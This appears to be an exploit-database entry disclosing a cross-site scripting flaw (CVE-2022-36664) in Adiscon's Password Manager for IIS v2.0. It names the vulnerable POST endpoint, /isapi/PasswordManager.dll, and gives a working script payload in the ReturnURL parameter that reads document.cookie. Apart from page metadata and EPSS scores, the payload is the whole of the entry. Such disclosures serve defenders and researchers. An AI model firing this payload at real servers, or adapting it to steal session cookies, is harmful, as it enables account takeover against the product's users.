Lucene search

K
zdtVP4TR10T1337DAY-ID-38302
HistoryMar 27, 2023 - 12:00 a.m.

Password Manager for IIS v2.0 - XSS Vulnerability

2023-03-2700:00:00
VP4TR10T
0day.today
152
password manager
iis
xss
vulnerability
affected uri
post request

EPSS

0.001

Percentile

47.3%

# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
# Version: *Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664


Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1

Affected Parameter in http
payload:*ReturnURL*=<script>alert(document.cookie)</script>

*Cordially,*

EPSS

0.001

Percentile

47.3%